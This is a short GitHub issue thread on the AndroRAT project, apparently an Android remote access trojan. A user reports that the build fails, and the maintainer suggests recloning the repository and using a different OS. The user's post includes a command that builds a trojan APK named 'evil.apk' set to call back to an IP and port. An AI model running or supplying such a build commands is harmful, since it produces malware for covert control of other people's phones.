### ISSUE TITLE
Building Failed

### ISSUE THREAD

**Issue by zakiraaa** [karma9874/AndroRAT#4]
![Screenshot_20200602-084615__01](https://user-images.githubusercontent.com/65459828/83476285-ee263400-a4ad-11ea-9ef2-e6779a5ab812.jpg)
sudo python3 androRAT.py --build -i 192.169.x.x -p 8080 -o evil.apk

**Comment by karma9874** [comment]
Could you please **reclone the repo** and try again. I think some of the internal files are edited.

**Comment by zakiraaa** [comment]
I already recloned it but doesn't work
Actually I am using kali nethunter, Is something due to this ?

**Comment by karma9874** [comment]
It shouldn't be but can't say. Please try it with normal kali or windows
